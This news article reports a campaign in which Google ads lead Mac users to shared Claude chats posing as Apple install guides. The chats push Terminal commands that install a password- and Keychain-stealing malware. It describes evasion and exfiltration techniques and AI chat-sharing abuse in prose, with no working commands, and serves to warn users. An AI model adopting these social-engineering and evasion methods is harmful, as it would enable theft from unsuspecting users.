-
Attackers abuse Google Ads and Claude.ai chats to trick people searching for Claude downloads into running malicious Terminal commands that install Mac malware.
-
The malware checks for Russian keyboard settings before proceeding, it then steals browser passwords, cookies, and Keychain data while using polymorphic delivery to evade detection.
-
The scam hides behind a legitimate destination URL because the criminals placed their instructions inside Claude’s own shared chat feature rather than using a fake website.
Cybercriminals have launched a new scheme that exploits Google’s advertising platform and Anthropic’s Claude sharing feature. The attackers aim to infect Apple computers with data-stealing malware.
People looking for ‘Claude Mac download’ see sponsored search results at the top of Google. Those ads look legitimate because they show claude.ai as the destination website. But clicking leads victims through a malware installation process hidden inside a shared Claude conversation.
Security engineer Berk Albayrak from Trendyol Group uncovered this operation and posted his findings on LinkedIn. Later, a second discovery unfolds how malicious Claude chat is using different technical infrastructure.
Fake Apple support page walks victims through terminal commands
The criminals created a shared Claude chat that mimics an official installation guide; the document pretends to be from ‘Apple support’ in order to increase their credibility in the eyes of potential victims.
Attackers aren’t the only ones eroding trust in AI platforms. Anthropic itself faced user backlash over alleged spyware behavior in its macOS Claude app, a reminder that even legitimate AI tools face scrutiny over their data practices.
The chat provides step-by-step instructions to open up a terminal and then execute a specific command, which will download malicious software to the victim’s MAC. Both chats that were recently discovered are set up in exactly the same way; however, each presently has a different domain name as well as its own separate malware payloads.
Each time a victim downloads the payload, the server sends a uniquely scrambled version. Security experts call this technique polymorphic delivery. It helps the malware evade detection because the file looks different with every request.
One version of the attack checks the victim’s keyboard settings before proceeding. If the computer uses Russian or CIS region input sources, the script shuts down immediately. It sends a signal to the attacker’s server indicating a blocked installation. Only systems that pass this geographic filter receive the full payload.
Malware steals passwords and sends them to attackers
The infection script retrieves several details regarding the victim’s machine. It grabs the external IP address, computer name, operating system version, and keyboard language setting. The script transmits all this information back to the criminals for victim profiling.
One attack variant downloads a second-stage payload and runs it through osascript, which serves as macOS’s native scripting engine. This method gives attackers remote control over the victim’s machine without placing any traditional software file on the hard drive.
Another variant skips the profiling step and moves straight to execution. This version steals browser passwords, cookies, and macOS Keychain entries. It packages the stolen data and sends everything to the attacker’s server. Security researchers identified this as a variant of the MacSync information stealer.
Search ads hide the danger behind a real website
This operation differs from typical malvertising campaigns. Older schemes directed users to fake websites that closely mimicked real ones. Here, the Google ad’s destination points to the genuine claude.ai domain.
The criminals placed their malicious instructions inside Claude’s own shared chat feature. Victims never visit a suspicious or fake website. The destination remains completely legitimate throughout the process.
Attackers have used AI platform shared chats for malicious purposes before. In December, another report revealed similar campaigns abusing ChatGPT and Grok. Earlier this year, threat actors ran an identical scheme targeting macOS developers searching for Homebrew.
Claude-focused attacks reach a broader audience than previous campaigns. Non-technical users curious about AI make perfect targets. They rarely question terminal commands or recognize the warning signs of social engineering.
Security experts recommend typing claude.ai directly into the browser address bar instead of clicking sponsored search results. The real Claude Code CLI comes from Anthropic’s official documentation. It never requires users to paste terminal commands from a chat interface. Anyone who sees instructions asking for terminal entries should treat them as suspicious.
